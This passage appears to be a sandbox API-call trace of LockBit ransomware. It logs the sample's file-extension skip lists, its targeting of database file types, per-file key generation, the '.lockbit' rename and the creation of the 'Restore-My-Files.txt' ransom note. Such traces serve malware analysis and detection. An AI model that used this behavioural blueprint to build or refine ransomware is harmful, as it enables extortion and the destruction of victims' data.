[0204.505] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.505] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.505] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21364_.GIF") returned 1 [0204.505] lstrcmpiW (lpString1="ntldr", lpString2="BD21364_.GIF") returned 1 [0204.505] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21364_.GIF") returned 1 [0204.505] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21364_.GIF") returned 1 [0204.506] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21364_.GIF") returned -1 [0204.506] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21364_.GIF") returned 1 [0204.506] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21364_.GIF") returned 1 [0204.506] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.506] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF") returned=".GIF" [0204.506] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.506] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.506] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.506] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.506] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.506] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.506] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.506] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.507] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.507] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF.lockbit") returned 78 [0204.507] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21364_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.510] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.510] malloc (_Size=0x40068) returned 0x3df0008 [0204.510] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=245) returned 1 [0204.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.511] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.515] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.515] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.515] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.515] free (_Block=0x1fa2ed8) [0204.515] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21364_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.515] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.516] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.516] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52007200, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce3b060, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x52007200, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21365_.GIF", cAlternateFileName="")) returned 1 [0204.516] lstrcmpiW (lpString1=".", lpString2="BD21365_.GIF") returned -1 [0204.516] lstrcmpiW (lpString1="..", lpString2="BD21365_.GIF") returned -1 [0204.516] PathFindExtensionW (pszPath="BD21365_.GIF") returned=".GIF" [0204.516] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.516] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.516] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.517] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.517] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.517] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.517] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.517] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.517] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21365_.GIF") returned 1 [0204.518] lstrcmpiW (lpString1="ntldr", lpString2="BD21365_.GIF") returned 1 [0204.518] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21365_.GIF") returned 1 [0204.518] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21365_.GIF") returned 1 [0204.518] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21365_.GIF") returned -1 [0204.518] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21365_.GIF") returned 1 [0204.518] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21365_.GIF") returned 1 [0204.518] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.518] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF") returned=".GIF" [0204.518] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.518] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.518] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.518] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.518] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.518] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.518] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.519] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.519] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF.lockbit") returned 78 [0204.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21365_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.520] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.521] malloc (_Size=0x40068) returned 0x3df0008 [0204.521] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=236) returned 1 [0204.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.521] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.522] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.526] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.526] malloc (_Size=0xb2) returned 0x1fa2ed8 [0204.526] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.526] free (_Block=0x1fa2ed8) [0204.526] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21365_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.526] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.526] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.526] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52007200, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbce3b060, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x52007200, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0xc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21366_.GIF", cAlternateFileName="")) returned 1 [0204.526] lstrcmpiW (lpString1=".", lpString2="BD21366_.GIF") returned -1 [0204.526] lstrcmpiW (lpString1="..", lpString2="BD21366_.GIF") returned -1 [0204.526] PathFindExtensionW (pszPath="BD21366_.GIF") returned=".GIF" [0204.527] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.527] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.527] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.528] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.528] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.528] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.528] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21366_.GIF") returned 1 [0204.528] lstrcmpiW (lpString1="ntldr", lpString2="BD21366_.GIF") returned 1 [0204.528] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21366_.GIF") returned 1 [0204.528] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21366_.GIF") returned 1 [0204.528] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21366_.GIF") returned -1 [0204.528] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21366_.GIF") returned 1 [0204.528] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21366_.GIF") returned 1 [0204.529] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.529] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF") returned=".GIF" [0204.529] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.529] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.529] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.530] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.530] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.530] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.530] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF.lockbit") returned 78 [0204.530] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21366_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21366_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0204.532] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.532] malloc (_Size=0x40068) returned 0x3df0008 [0204.532] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=200) returned 1 [0204.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0204.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.533] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0204.533] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0204.537] 